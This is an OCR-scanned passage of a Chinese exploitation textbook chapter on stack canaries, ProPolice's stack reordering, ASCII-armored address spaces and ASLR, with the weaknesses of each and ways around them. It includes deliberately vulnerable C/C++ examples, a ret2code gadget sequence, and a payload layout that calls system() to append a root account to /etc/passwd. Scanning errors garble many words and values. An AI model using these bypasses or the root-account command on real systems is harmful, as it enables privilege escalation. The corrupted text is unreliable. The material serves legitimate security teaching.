函数 指针 来 钩 住 执行 流 时 ， 想 找到 控制 选择 函数 参数 的 方法 并 不 容易 。 如 果 已 经 有 合适 
的 代码 了 ， 可 以 直接 跳 到 那里 。 但 是 如 果 需 要 控制 被 调用 函数 的 参数 ， 就 基本 上 没什么 
机 会 了 。 

选择 正确 的 函数 指针 可 能 是 唯一 的 选择 。 如 果 你 为 释放 改写 GOT 条 目 ， 可 能 可 以 用 指向 
缓冲 区 的 指针 调用 释放 。 如 果 可 以 找到 正确 的 字 节 组 合 ， 就 可 以 控制 帧 并 完成 chained 
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ret2code: 

pop eax 

pop ebp 

mov esp, ebp # leave 
pop ebp 

ret 


在 这 个 例子 里 ， 第 一 个 bop 从 栈 上 获得 返回 地 址 ， 第 二 个 pop 获 得 这 个 函数 的 参数 ， 在 调 
用 free() 时 ， 它 指向 你 的 缓冲 区 。 这 个 指针 是 放 进 栈 里 的 指针 ， 从 这 时 起 ， 你 可 以 控制 
这 个 栈 。 这 样 的 构造 不 太 常 见 ， 一 般 不 太 可 能 出 现在 进程 的 内 存 里 ， 但 它 可 以 使 人 联想 
到 其 他 可 能 性 。 例 如 ， 如 果 你 可 以 控制 多 个 函数 指针 ， 就 可 以 选择 改写 两 个 将 被 相继 调 
用 的 函数 指针 《〈 如 导入 表 )。 可 以 用 第 一 个 指针 设置 一 些 寄 存 器 ， 用 第 二 个 指针 为 chained 
ret2code 攻击 设立 帧 指针 。 

至 今 仍 未 找到 把 函数 指针 改写 变 成 chained ret2code 甚 至 是 更 简单 的 ret2libc 攻 击 的 方法 , 但 
解决 这 个 问题 的 过 程 充满 乐趣 ! 


14.1.3” 栈 数据 保护 

栈 缓冲 区 溢出 长 久 以 来 就 是 最 常见 的 安全 漏洞 ， 也 是 最 容易 被 利用 的 安全 漏洞 。 同 时 ， 它 们 
也 向 攻击 者 提供 了 许多 攻击 的 可 能 性 ， 就 像 在 14.1.2 节 里 介绍 的 那样 。 

出 于 这 个 原因 ， 人 们 设计 了 一 些 保护 机 制 来 预防 破解 栈 缓冲 区 溢出 。 本 节 介 绍 最 常见 的 保护 
机 制 ， 它 们 在 单独 使 用 时 强度 可 能 不 够 ， 但 是 是 整体 保护 系统 的 关键 组 件 。 

1. canary 

canary 这 个 名 字 来 自 采 矿业 。 矿 工 在 下 矿 时 会 带 一 只 鸟 ， 从 而 知道 氧气 什么 时 候 快 用 完了 : 
因为 鸟 儿 比 人 类 敏感 ， 当 氧气 缺少 时 ， 它 会 先 于 人 类 而 死 掉 ， 从 而 提醒 矿工 及 早 逃 生 。 这 个 暗喻 
非常 清楚 地 解释 了 这 个 概念 。 

在 系统 安全 领域 ，canary (cookie) 是 一 个 32 位 的 值 ， 被 放 在 缓冲 区 和 敏感 信息 之 间 。 如 
果 发 生 缓冲 区 溢出 ， 那 么 它 在 危害 敏感 信息 的 途中 会 改写 这 些 canary， 应 用 程序 能 察觉 到 改变 ， 
并 在 访问 敏感 信息 之 前 知道 敏感 信息 是 否 受 到 危害 。 

这 个 想法 最 初 来 自 StackGuard，Crispin Cowan 在 1997 年 12 月 18 日 第 一 次 把 它 介绍 给 大 家 
Chttp://marc.info?m=88255929032288), Hiroaki Etoh 在 2000 年 6 月 19 日 发 布 ProPolice 时 ， 对 它 做 了 - 
很 大 的 改进 Chttp://www.trl.ibm.com/projects/security/ssp ) 。 ProPolice 又 名 SSP ( Stack-Smashing 
Protector)， 现 在 称 为 GCC SSP (Stack-Smashing Protector， 或 者 Stack-Protector)。 它 已 按 GCC 支 
持 的 形式 重新 实现 ， 并 成 为 主流 GCC 4.1 版 本 的 一 部 分 。 

当 第 一 次 发 布 StackGuard 时 ， 对 大 多 数 基 于 栈 的 缓冲 区 利用 来 说 ， 都 是 通过 改写 保存 的 返回 
地 址 来 进行 的 ， 因 此 ， 最 初 的 想法 只 是 保护 保存 在 栈 上 的 返回 地 址 。Tim Newsham 随 即 证 明 ， 当 
其 他 的 本 地 变量 包含 可 感知 的 (sensible) 信息 时 Chttp://seclists.org/bugtraq/1997/Dec/0123.html), 
StackGuard 将 失去 作用 。StackGuard 中 的 这 些 问题 从 未 被 修复 。5 年 后 ， 也 就 是 在 2002 年 4 月 ， 
Gerardo Richarte 介 绍 了 在 大 多 数 情形 里 怎么 绕 过 StackGuard (http://www.coresecurity.com/files/ 
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attachments/Richarte Stackguard 2002.pdf)， 主 要 原因 是 它 没 有 保护 其 他 的 本 地 变量 或 函数 参数 ， 
或 者 更 重要 的 原因 是 它 没有 保护 保存 的 帧 指针 和 其 他 寄存 器 。 尽 管 在 那个 时 候 ， 开 发 人 员 承 诺 
会 发 布 新 版 本 ， 但 之 后 就 杏 无 音讯 了 ， 一 直到 今天 它 被 ProPolice 和 Visual Studio 的 /Gs 保护 机 制 
所 取代 。 . 

第 一 种 canary 使 用 的 是 NULL canary, 全 部 由 0(ox00000000) 组 成 , 但 不 久 就 被 换 成 terminator 
canary (0x000aff0d)， 其 中 的 '\x00' 用 于 阻止 strcpy 0 及 类 似 功能 函数 ，'\x0d' 和 '\x0a' 用 
于 阻止 gets O 及 类 似 函数 ，'\xff' (EOF) 用 于 阻止 其 他 的 函数 和 硬 编码 的 循环 。 

对 于 terminator canary 来 说 ， 其 决 穿 在 于 ， 如 果 攻 击 者 企图 用 原始 值 改 写 canary， 字 符 串 函数 
将 停止 向 缓冲 区 里 写 入 数据 ， 在 缓冲 区 之 后 的 数据 将 不 会 被 恶化 。 

第 三 种 canary 是 random canary， 它 是 随机 产生 的 ， 也 是 从 内 存 中 读 取 的 ， 攻 击 者 通过 更 改 ， 
或 者 只 要 预先 知道 ， 就 可 以 成 功 地 进行 攻击 。 

在 下 面 的 栈 布局 里 ， 你 可 以 看 到 StackGuard 如 何不 保护 var1 和 保存 的 帧 指针 《在 Intel 上 是 
ebp)。 最 常见 的 攻击 情形 是 通过 改写 帧 指针 控制 整个 栈 帧 〈 就 像 通过 调用 函数 控制 一 样 )， 包 括 
它 的 变量 、 参 数 和 返回 地 址 。 在 这 个 例子 里 , 在 第 二 个 返回 时 钧 住 执行 流 是 可 能 的 , 非常 像 Solaris 
的 基于 栈 的 缓冲 区 溢出 利用 。 如 果 栈 是 可 执行 的 ， 直 接 跳 到 它 就 可 以 了 ， 和 否则 ， 可 以 执行 chained 
ret2code 攻 击 ， 甚 至 是 在 应 用 程序 被 StackGuard 保 护 的 时 候 执行 攻击 。 





t 低地 址 
Var2 4B 
buf 80B 
varl 4B 
saved ebp 4B 
canary 4B 
return address 4B 
arg 4B 

+ 高 地 址 


要 想 了 解 更 多 关于 StackGuard 的 信息 及 绕 过 它 的 方法 ， 建 议 把 Richarte 的 文章 找 来 读 一 下 。 

今天 ， 几 乎 看 不 到 只 保护 返回 地 址 的 canary 了 。 我 们 该 进入 下 一 节 了 。 

2. 理想 的 栈 布局 

至 少 还 有 两 个 方法 可 用 于 保护 其 他 可 能 保存 在 脆弱 缓冲 区 之 后 的 敏感 信息 。 可 以 在 每 个 缓冲 
区 后 加 一 个 canary， 然 后 在 每 次 访问 保存 在 canary 后 面 的 数据 之 前 检验 它 是 否 被 改变 ， 或 者 ， 也 
可 以 重新 排序 栈 上 的 本 地 变量 ， 把 敏感 数据 移 到 缓冲 区 溢出 无 法 影响 的 地 方 。 尽 管 前 者 可 以 通过 
修改 编译 器 来 实现 ， 但 从 未 有 人 把 它 作为 一 种 可 能 性 提出 来 或 做 计划 〈 直 到 我 们 意识 到 )， 可 能 
是 考虑 到 它 对 性 能 的 影响 吧 。 而 后 者 第 一 次 被 提 及 ， 是 Theo de Raadt 在 1997 年 12 月 19 日 ， 把 它 作 
为 编译 器 优化 的 副作用 提出 来 的 《http://seclists.org/bugtraq/1997/Dec/0128.html)， 但 真正 将 它 作 
为 一 个 保护 机 制 介绍 给 大 家 并 实现 的 ， 是 在 2000 年 6 月 19 日 Hiroaki Etoh 发 布 ProPolice 时 
(http://www.trl.ibm.com/projects/security/ssp/main.html)。 后 来 ，Microsoft 的 Visual Studio 慢 慢 引 入 
了 高 度 雷 同 的 概念 一 一 也 就 是 大 家 所 熟知 的 /GS 特性 。 
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ProPolice 把 保存 在 栈 里 的 数据 重新 排序 ， 并 称 之 为 理想 的 栈 布局 。 它 把 本 地 缓冲 区 放 在 栈 帧 
尾部 ， 重 新 部 署 它们 前 面 的 本 地 变量 ， 还 把 参数 复制 到 本 地 变量 中 ， 所 以 参数 也 会 被 重新 部 署 。 
它 不 会 重新 部 署 保存 在 函数 入 口上 的 寄存 器 〈 包 括 帧 指针 ) 或 返回 地 址 ， 但 会 在 合适 的 地 方 放 一 
个 canary 来 保护 它们 。 

下 面 的 栈 布局 是 使 用 ProPolice (现代 GCC 上 的 -fstack-protector 选 项 ) 编译 例子 程序 的 
结果 。 作 为 额外 的 测试 ， 我 们 还 打开 了 优化 选项 〈-o4)， 在 过 去 ， 为 了 优化 性 能 ，ProPolice 实 际 
上 是 被 禁用 的 。 


+ 低地 址 

arg copy 4B 
var2 4B 
vari 4B 
buf 80B 
canary 4B 
保存 的 ebx 4B 
保存 的 ebp 4B 
返回 地 址 4B 
arg (REH) 4B 
上 高 地 址 


可 以 看 出 varL1、var2 和 arg 的 副本 已 经 远离 buf 上 的 洪 出 了 ， 尽 管 保存 的 ebp、ebx 和 返回 地 
址 仍 可 以 被 改写 ， 但 在 访问 它们 之 前 会 检查 canary， 因 此 可 以 保护 信息 不 被 获取 ， 或 者 仅 在 检查 
canary 后 才 可 以 访问 。 

有 很 多 关于 保护 机 制 对 应 用 程序 的 性 能 影响 的 争论 。 作 为 对 这 些 争 论 的 回应 ，ProPolice 和 
Visual Studio 将 仔细 评估 哪些 函数 需要 保护 ， 哪 些 不 需要 保护 。 此 外 ，Visual Studio 只 复制 有 漏洞 
的 参数 (http:/blogs.msdn.comy/branbray/archive/2003/11/11/51012.aspx)， 剩 下 的 函数 不 予 保护 。 但 
是 评估 机 制 可 能 太 严 格 了 ， 一 些 易 遭 攻击 的 函数 并 没有 得 到 有 效 的 保护 。 

同时 ， 即 使 这 些 选 择机 制 不 适当 ， 每 一 个 函数 和 参数 都 受到 保护 了 ， 但 仍 有 一 些 理想 的 栈 布 
局 照顾 不 到 的 地 方 。 

在 有 几 个 局 部 缓冲 区 的 函数 里 ， 它 们 都 相继 放 在 栈 里 ， 因 此 ， 从 一 个 缓冲 区 溢出 到 下 一 

个 缓冲 区 是 有 可 能 的 。 这 种 情形 的 影响 范围 取决 于 受 影 响 的 缓冲 区 对 应 用 程序 的 作用 ， 
像 每 一 个 数据 亚 化 攻击 那样 。 例 如 ， 可 以 把 缓冲 区 溢出 变 成 〈 更 灵活 的 ) 格式 化 串 ， 就 
像 dhcp 漏 洞 (CVE-2004-0460). 

a 结构 成 员 因 为 互 操 作 性 (interoperability〉 的 问题 而 不 能 被 重新 排列 ， 因 此 ， 当 它们 包含 
缓冲 区 时 ， 这 个 缓冲 区 将 位 于 由 struct 或 class 声 明 所 定义 的 位 置 ， 在 缓冲 区 溢出 的 情 
况 下 ， 在 它 之 后 定义 的 字段 可 以 被 控制 。 

指针 数组 或 不 同 于 chars 的 对 象 这 样 的 结构 ， 可 以 被 溢出 或 作为 敏感 信息 被 精心 处 理 ， 这 
取决 于 应 用 程序 的 语义 〈semantics)。 构 造 一 个 判定 把 它们 移 到 栈 帧 的 安全 区 域 或 是 留 在 
和 危险 区 的 算法 ， 可 能 有 些 难 度 〈 甚 至 不 可 能 )。 
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a 对 那些 有 着 不 定数 量 参数 的 函数 来 说 ， 因 为 预先 不 知道 参数 的 个 数 ， 所 以 只 能 把 它们 留 
在 可 到 达 的 区 域 ， 也 就 不 能 有 效 地 保护 他 们 。 

口 用 alloca() 在 栈 上 动态 创建 的 缓冲 区 将 不 可 避免 地 被 放置 在 栈 顶 ， 从 而 和 其 他 局 部 变量 
一 样 处 于 危险 之 中 。 对 运行 时 确定 大 小 的 〈runtime-sized) 局 部 缓冲 区 来 说 也 是 一 样 的 ， 
就 像 GCC 对 C 的 扩展 所 允许 的 那样 ， 见 下 面 的 例子 ， 


#include <stdio.h> 
typedef int(*fptr) (const char *); 


vulnerable_function(char *msg, int size, fptr logger) { 
char buf[size+10]; 


sprintf(buf, "Message: %s", msg); 
logger (buf); 

} 

int main(int c, char **v) { 
vulnerable function(v[1], 80, puts); 


H 

掌握 了 以 上 几 种 情况 ， 几 乎 就 可 以 防范 所 有 基于 栈 的 缓冲 区 溢出 ， 不 必 把 它们 再 当 作 问题 。 
但 照例 还 需要 问 自己 几 个 “真正 的 问题 ” 

如 果 被 恶化 ， 为 攻击 者 提供 方便 的 脆弱 的 缓冲 区 后 面 还 有 什么 东西 ? 

通常 来 说 ,答案 是 返回 地 址 或 其 他 的 东西 ， 比 如 帧 指针 、 本 地 变量 、 函 数 参 数 或 保存 在 函数 
入 口 处 的 其 他 寄存 器 等 。 但 ProPolice 和 Visual Studio 的 /Gs 特 性 把 它们 都 保护 起 来 了 。 那 么 ， 缓 冲 
区 后 面 还 会 有 对 攻击 者 有 用 的 东西 吗 ? 答案 非常 明显 一 一 有 ! 缓冲 区 后 面 总 会 有 一 些 有 用 的 东 
西 。 

特别 是 在 32 位 的 Windows 上 ， 大 家 都 知道 Exception Registration Record 保 存在 栈 里 ， 尽 管 在 
新 版 本 的 Visual Studio 里 已 经 把 它 放 在 安全 区 域 里 了 ， 但 是 如 果 脆 弱 函 数 的 异常 处 理 程序 没有 处 
理 产 生 的 异常 ， 则 调用 函数 (calling function〉 的 Exception Registration Record 仍 可 以 被 触 到 ， 从 
而 被 调用 。 更 详细 的 信息 可 参见 第 8 章 。 

从 Windows 推 广 到 一 般 情 形 ， 在 脆弱 的 函数 返回 前 ， 栈 上 仍 可 能 留 有 可 能 被 使 用 的 信息 : 通 
过 指向 脆弱 函数 的 指针 直接 或 间接 传递 的 其 他 函数 的 局 部 变量 。 在 这 样 的 情形 里 ， 函 数 在 退出 时 
才 会 检查 cookie， 但 是 由 于 参数 是 在 函数 内 部 使 用 的 ， 因 此 你 将 有 机 会 间接 控制 这 些 参数 。 

在 C++ 应 用 程序 里 经 常 可 以 看 到 这 样 的 代码 构造 。 看 下 面 的 例子 : 


#include <stdio.h> 





class AClass { 
public: 
virtual int some_virtual_function() { return 1; } 


}; 


int a_vulnerable_function(AClass &arg) { 
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char buf[80]; 


gets (buf); 
return printf("%d\n", arg.some_virtual_function()); 


} 


int main() { 
AClass anInstance; 
return a_vulnerable_function(anInstance) ; 


} 
这 个 程序 执行 a_vulnerable_function() 时 ， 它 的 栈 布 局 像 下 面 这 样 : 


1 低地 址 
arg copy 4B 
buf 80B 
canary 4B 
保存 的 ebp 4B 
返回 地 址 4B 
arg( 未 使 用 ) 4B 
anInstance 4B 一 main() KJAM IER RETT ES 
保存 的 ebp 4B 
返回 地 址 4B 
argc 4B 
argv 4B 
envp 4B 

+ 高 地 址 


可 见 anTnstance 保 存在 main ( 的 本 地 存储 区 里 ， 它 位 于 buf 之 后 (也 在 canary 之 后 )。 尽 管 
arg 被 复制 到 它 指向 或 没有 指向 的 缓冲 区 的 安全 区 。 尽管 canary 被 改变 了 ， 但 它 在 函数 结束 前 不 
会 被 检查 ， 而 这 对 检验 函数 参数 的 完整 性 来 说 ， 已 经 太 晚 了 。 

看 下 面 这 个 更 深奥 也 更 常见 的 例子 , 在 这 个 例子 里 , 显然 没有 向 脆弱 的 函数 传递 参数 ， 可 是 ， 
在 C++ 里 ,“this” 指 针 总 是 被 当 作 被 调用 方法 的 隐 含 参数 来 传递 ， 在 这 个 例子 里 ， this 实 际 上 是 
anInstance， 而 且 被 保存 在 main() 的 本 地 存储 区 里 ， 恰好 在 缓冲 区 的 后 面 。 


#include <iostream> 


class AClass ( 
public: 
virtual int some_virtual_function() { return 1; ) 


void a vulnerable, function() { 
char buf[80]; 
Std::cin »» buf; // gets() is just the same 


Some virtual function(); 
} 
H 


int main() { 
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AClass anInstance; 


anInstance.a vulnerable function(); 
} 











注解 GCC 遇 到 不 安全 地 使 用 std: :cin 的 情况 时 不 会 发 出 警告 ， 但 是 在 使 用 gets () 时 ， 它 却 会 
发 出 警告 ， 这 个 现象 比较 有 趣 。 你 可 能 奇怪 是 谁 用 了 C 和 C++ 混合 编程 呢 。 在 Google 的 
/codesearch 里 搜索 "char buf[""cin >> buf"， 很 快 就 可 以 得 到 答案 了 。 


关于 这 个 漏洞 的 具体 实例 ,比较 少见 但 讨论 比较 多 的 是 , 应 用 程序 什么 时 候 使 用 放置 在 栈 上 
HIGCCR ABE. BEA (trampoline) 是 一 小 段 运行 时 创建 的 代码 。 它 们 唯一 的 使 命 是 作为 参数 
传递 给 被 调用 的 函数 ， 其 暴露 的 漏洞 和 上 例 完全 一 样 。 它 们 很 少 被 用 到 ， 因 此 ， 在 编写 破解 程序 
时 ， 你 一 般 不 太 可 能 会 发 现 。 

被 适当 实现 时 ， 栈 数据 保护 是 非常 有 效 且 重要 的 ， 特 别 是 当 W^X 存 在 时 ， 此 时 有 可 能 漏网 
的 是 ret2code 攻 击 。 当 函数 被 canary 保 护 时 ， 它 不 但 受 缓冲 区 溢出 的 保护 ， 在 chained ret2code 攻 击 
中 也 很 难 利用 它 ， 因 为 在 使 用 伪造 的 栈 帧 时 ，canary 检 查 会 失败 。 从 安全 的 角度 来 看 ， 究 竟 是 每 
一 个 函数 都 被 保护 了 ， 还 是 只 有 少数 函数 被 保护 了 ， 这 是 有 很 大 差别 的 。 

14.1.4 AAAS 

前 面 介绍 不 可 执行 栈 保 护 时 曾经 提 到 过 , 最 有 可 能 绕 过 它 的 攻击 方法 要 数 ret2libe 了 。 作为 相 
应 的 解决 办 法 ，Solar Designer 为 Linux 内 核 制 作 了 一 个 补丁 ， 把 所 有 的 共享 库 加 载 到 以 NUL 字 节 
('\x00') 开头 的 内 存 地 址 。 他 最 初 选择 的 是 从 0x00001000 开 始 的 一 段 地 址 (http://marc.info?m= 
87602566319532)， 但 不 久之 后 因为 与 YM86〔 像 dosemu》〉 程 序 不 兼容 ， 他 把 这 段 地 址 向 下 移 了 
一 些 ， 使 其 变 成 更 安全 的 以 0x00110000 开 始 的 一 段 地 址 范围 (http://marc.info?m= 
87602566319543，http://marc.info?m=87602566319597)。 这 个 主意 非常 像 对 Ingo Molnar 前 些 天 发 
表 的 帖子 的 改进 《http://marc.info?m=87602566319467)。 

像 stzcpy() 这 样 的 字符 串 函 数 在 碰 到 Nur 字 节 时 将 会 停止 复制 数据 ， 因此 ， 攻击 者 在 溢出 的 
字符 串 尾部 只 能 写 一 个 NUL 字 节 ， 这 与 terminator canary 非 常 像 。 








注解 在 介绍 AAAS 前 , 需要 读者 记 住 一 点 : Windows 可 执行 文件 默认 被 加 载 到 0x00400000， 黑 
认 栈 的 地 址 从 0x00123cocx 开 始 ， 这 看 似 安全 的 设计 并 不 是 设计 者 有 ， 立 而 为 之 的 。 





AAAS (ASCII Armored Address Space) 在 big-endian 平 台 上 的 保护 功效 更 强 一 些 ， 因 为 与 第 
一 个 字 节 相 比 ， 返 回 地 址 在 进一步 被 恶化 前 ，NUL 字 节 首 先进 入 内 存 并 截断 字符 串 操 作 。 然 而 ， 
在 little-endian 平 台 〈 比 如 Intel) 上 ，NOL 最 后 才 进 入 内 存 ， 这 样 就 可 以 选择 返回 到 哪个 库 函 数 ， 
即使 这 个 函数 的 高 序 字 节 是 0 也 无 关 紧 要 ， 因 为 可 以 利用 字符 串 中 拖 尾 的 Nor。 

看 一 个 简单 的 例子 ， 假 设想 调用 system("echo gera::0:0::/:/bin/sh >>/etc/ 
passwa") ， 假 设 知道 system() 的 地 址 是 ox00123456， 也 知道 缓冲 区 的 地 址 是 oxbfbf1234， 那 
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么 可 以 用 下 面 的 数据 改写 栈 : 
t 低 字 节 
XXXX 4B, 在 0xbfbf1234 地 址 处 结束 
YYYY 4B，system() 返 回 的 地 址 
"echo 
gera::0:0::... 39B 
ML 2B， 其 余 代码 的 注释 
ves 帧 指针 填充 
34 12 bf bf 4B， 新 帧 指针 
59 34 12 00 4B, system() 的 地 址 加 3， 位 于 "mov ebp，esp" 之 后 
1 高 字 节 


使 用 这 个 窗 门 ,如果 你 可 以 使 帧 指针 指向 缓冲 区 ,那么 就 可 以 控制 返回 到 的 函数 的 整个 栈 帧 ， 
包括 它 的 参数 、 返 回 地 址 ， 以 及 退出 时 的 帧 指针 。 它 不 是 一 个 简单 的 程序 (procedure)， 但 在 攻 
击 受 AAAS 保 护 的 系统 时 ， 它 是 执行 ret2libc 甚 至 是 ret2strcpy/ret2gets 攻 击 的 有 趣 且 非常 普通 的 方 

此 外 ， 在 大 多 数 AAAS 实 现 里 ， 主 可 执行 二 进 制 本 身 没有 移 到 AAAS， 可 执行 文件 通常 提供 
一 些 可 重用 的 代码 (包括 函数 的 epilogues 和 程序 的 PLT)， 从 而 增加 了 ret2text CE ff chained 
ret2code、ret2plt 和 ret2dl-resolver〉 攻 击 找到 必要 代码 的 可 能 性 ， 就 像 在 前 文中 讨论 的 那样 。 

改进 AAAS 使 它 也 能 防范 ret2text 攻 击 的 最 直接 的 想法 可 能 是 把 二 进 制 移 到 AAAS， 但 这 样 一 
来 ， 就 义 不 能 防范 gets () 所 引起 的 溢出 或 使 用 前 面 讲述 过 的 穿 门 了 ， 因 此 ， 需 要 学 习 更 好 的 也 
更 新 一 些 的 保护 措施 : ASLR。 


14.1.5 ASLR 

ASLR (Address Space Layout Randomization) 的 原理 很 简单 : 如果 所 有 的 地 址 ( 包 插 库 、 可 
执行 应 用 程序 、 栈 及 堆 等 ) 都 随机 化 了 ， 那 么 攻击 者 就 不 知道 跳 到 哪里 才能 执行 代码 ， 或 者 在 只 
针对 数据 的 攻击 中 ， 不 知道 把 指针 指向 哪里 了 。 

2001 年 ， 当 pipacs 第 一 次 在 Linux 的 PaX 里 实现 ASLR 时 ， 他 说 得 非常 清楚 : 除非 所 有 的 地 址 
都 被 随机 化 了 且 不 可 预知 ， 否 则 某 些 攻击 总 会 找到 可 以 利用 的 空子 。 可 以 在 http://pax. 
grsecurity.net/docs/ 上 阅读 有 关 PaX 的 文档 ， 其 中 详细 描述 了 每 一 个 实现 特性 ， 并 仔细 分 析 了 可 能 
存在 的 攻击 点 。 

攻击 者 如 果 可 以 直接 向 可 执行 内 存 注 入 外 来 的 代码 ， 而 且 那 里 有 大 量 的 nops， 那 么 即使 是 
近似 (不 精确 〉 的 地 址 ， 也 足以 可 靠 地 执行 代码 了 。 耕 则 ， 如 果 因 为 W^X 使 用 恰当 ,或 者 由 于 代 
码 的 地 址 是 可 变 的 而 强制 跳 床 必须 使 用 ret2code， 则 破解 程序 必须 跳 到 精确 的 地 址 才 行 。 在 这 些 
情形 里 ， 如 果 可 以 随机 向 地 址 空间 里 引入 大 量 粹 (entropy)， 那 么 必须 仔细 研究 代码 执行 利用 程 
序 的 选项 : 

a 在 可 预计 的 地 址 里 剩 有 国定 的 东西 吗 ? 

在 大 多 数 情形 下 ， 答 案 是 肯定 的 。 它 是 大 多 数 ASLR 实 现 里 最 薄弱 的 点 。 


D 
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为 了 把 代码 段 映 射 到 随机 位 置 ， 必 须 把 它 编译 成 可 重 定位 的 对 象 。 动 态 加 载 的 库 通 常 是 

可 重 定位 的 ,但 应 用 程序 的 主 二 进 制 通常 被 编译 成 运行 在 已 知 的 固定 的 内 存 地 址 (例如 ， 

对 大 多 数 二 进 制 文件 来 说 ， 它 在 Linux 上 是 0x8048000)， 这 样 一 来 就 把 所 有 的 代码 置 于 

ASLR 之 外 了 。 

把 一 些 东西 编译 成 可 重 定位 的 主要 缺点 在 于 性 能 ， 不 仅 是 因为 可 重 定位 的 文件 在 每 次 加 

载 时 必须 被 特殊 处 理 ， 而 且 也 由 于 可 用 的 编译 优化 。 就 像 Theo de Raadt 所 解释 的 那样 ， 

GCC 儿 乎 需要 寄存 器 把 所 有 的 时 间 都 用 来 处 理 可 重 定位 目标 ， 而 在 像 Intel x86 这 样 的 平台 

上 ， 寄 存 器 是 稀缺 资源 ， 这 样 滥用 寄存 器 会 给 应 用 程序 带 来 非常 严重 的 性 能 问题 。 

最 早 的 PaX 文 档 及 后 来 的 邮件 列表 讨论 的 内 容 (http:/marc.info?m=102381113701725) 都 

清楚 地 声明 如果 要 完全 保护 二 进 制 ， 就 必须 重新 编译 它们 。 但 只 有 少数 发 行 版 这 样 做 

T. 

在 可 预计 的 地 址 剩 有 代码 时 ， 有 几 种 ret2code 可 供 使 用 。 在 刚才 讨论 的 例子 里 ，ret2text、 

ret2strcpy、ret2gets 以 及 最 普通 的 ret2plt 和 ret2dl-resolve 都 可 以 胜任 。 这 些 技术 的 主要 问题 

是 ， 它 们 很 有 可 能 会 需要 一 个 指针 ， 作 为 指向 选择 的 函数 的 参数 ， 如 果 大 多 数 的 地 址 都 

随机 化 了 ， 就 不 太 好 找到 需要 用 的 东西 了 。 

昌 尽 可 能 使 用 ret2gets。 它 只 用 一 个 参数 ， 而 且 只 要 求 是 W+X 段 里 的 地 址 〈 如 果 W^X 实 现 
恰当 ， 要 找到 这 样 的 地 址 会 很 难 )。 

上 在 已 知 的 位 置 用 mmap-ret2gets-code 创 建 W+X 段 ， 把 代码 读 到 它 里 面 ， 然 后 跳 向 它 。 

m 尝试 让 应 用 程序 为 你 提供 这 个 地 址 。 从 寄存 器 或 栈 深 处 找到 需要 的 地 址 也 许 是 可 能 的 。 
如 果 在 ASLR 范 围 外 发 现 正 确 的 代码 序列 ， 则 有 可 能 调节 〈leverage) 这 些 地 址 并 绕 过 
ASLR。 有 时 候 甚 至 部 分 地 址 就 够 用 了 。 例 如 ， 对 于 执行 代码 来 说 ， 改 写 返 回 地 址 或 函 
数 指针 的 最 低 两 个 字 节 可 能 就 足够 了 。 

在 一 些 系统 上 ， 特 别 是 现在 的 Linux 发 行 版 ， 一 般 都 有 一 个 包含 粘 合 代码 的 页 ， 供 程序 在 

调用 系统 调用 并 从 信和 号 返回 时 使 用 。 它 在 /proc/<pid>/maps 上 被 作为 [vaso] 列 出 来 了 。 

在 一 些 破解 程序 里 ， 已 经 证 实 这 页 包含 的 代码 非常 有 用 ， 但 一 些 系统 仍 把 它 映 射 到 固定 

的 位 置 ， 从 而 使 它 成 为 ret2syscall (更 常见 的 是 ret2code) 攻击 感 兴趣 的 目标 。 在 

http://www.trilithium.com/johan/2005/08/linux-gate/ 上 可 以 找到 更 多 关于 所 谓 的 linux-gate.so 

artifact 的 信息 。 记 住 ， 对 于 不 同 的 发 行 版 ，[vdso] 也 可 能 被 映射 成 不 可 执行 。 

猜测 随机 生成 的 地 址 容易 吗 ? 

衡量 地 址 随机 性 的 简单 方法 是 看 需要 猜测 多 少 位 。 尽 管 把 简单 的 分 析 及 复杂 的 统计 工作 

结合 起 来 可 以 得 到 一 个 简单 的 答案 ， 例 如 ， 如 果 破 解 程序 的 成 功率 仅仅 取决 于 8 位 〈 像 

Windows 的 堆 cookie)， 那 么 针对 单一 目标 的 攻击 ， 可 以 认为 它 是 不 可 靠 的 ， 然 而 ， 虹 虫 

的 出 生 将 因为 需要 触发 正确 的 值 而 呈 指 数 递减 ， 但 针对 有 着 大 量 系 统 或 用 户 的 组 织 的 攻 

击 将 有 很 高 的 成 功率 。 

其 他 要 考虑 的 因素 是 地 址 改变 的 频繁 程度 ， 如 果 漏 洞 允许 〈 或 不 允许 ) SASK, WA 

所 有 的 内 存 段 维护 它们 彼此 之 间 的 距离 ， 在 移动 时 保持 固定 的 位 移 。 如 果 攻 击 者 必须 改 
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写 多 个 指针 ， 而 且 只 需要 猜测 一 个 地 址 ， 这 将 变 得 更 容易 。 
每 个 实现 都 有 与 众 不 同 的 印记 ，14.2 节 将 介绍 具体 情况 。 
有 寻找 这 些 地 址 的 巧妙 方法 吗 ? 
这 可 能 是 更 有 意思 的 方法 ， 因 为 它 不 取决 于 实现 里 的 问题 。 如 果 应 用 程序 允许 攻击 者 以 
某 种 方式 了 解 它 的 内 存 布局 ， 那 么 攻击 者 可 以 减少 搜索 空间 ， 慢 慢 地 缩小 ， 直 到 剩 下 很 
小 的 范围 ， 然 后 就 可 以 彻底 搜查 了 。 
在 本 地 特权 提升 的 破解 程序 里 ， 最 好 有 宝贵 的 内 存 映 射 ， 例如 通过 Linux 系 统 上 的 
"/proc/<pid>/maps"。 如 果 内 存 映 射 不 可 用 ， 还 可 以 选择 暴力 破解 。 例 如 ， 在 2GHz 双 
核 运行 Linux 的 系统 上 ，1 分 钟 到 1.5 分 钟 内 就 可 以 使 一 个 程序 执行 2 次 。 待 搜索 空间 的 大 
小 与 需要 的 时 间 成 正比 ， 因 此 ， 可 以 假设 搜查 24 位 大 约 需 要 花 7.2 个 小 时 ， 或 者 近似 等 于 
系统 管理 员 在 家 美美 睡 上 一 觉 的 时 间 。 
在 远程 破解 过 程 中 也 必须 探讨 同样 的 想法 。 
远程 内 存 映射 的 例子 是 格式 化 串 bug， 攻 击 者 可 以 利用 它 看 到 输出 内 容 。 通 过 仔细 地 搜查 
内 存 ， 映 射 甚至 下 载 目标 应 用 程序 的 整个 内 存 都 是 有 可 能 的 。 然 而 ， 如 果 每 次 攻击 时 内 
存 空间 被 重新 随机 化 了 ， 要 完成 这 个 任务 就 不 是 那么 简单 了 如果 有 可 能 的 话 )。 
一 些 RPC (Remote Procedure Call) 接口 把 内 部 内 存 地 址 作为 “句柄 ”泄露 给 客户 端 。 
在 多 线程 应 用 程序 上 这 在 Windows 上 非常 常见 )， 每 个 线程 的 地 址 空间 不 能 被 重新 随机 
化 ， 从 而 使 收集 更 好 的 信息 变 得 更 容易 ， 但 同时 也 可 以 看 到 ， 如 果 线 程 裔 痰 了 ， 整 个 应 
用 程序 就 会 关闭 ， 从 而 断 了 进一步 破解 的 可 能 性 。 —— 
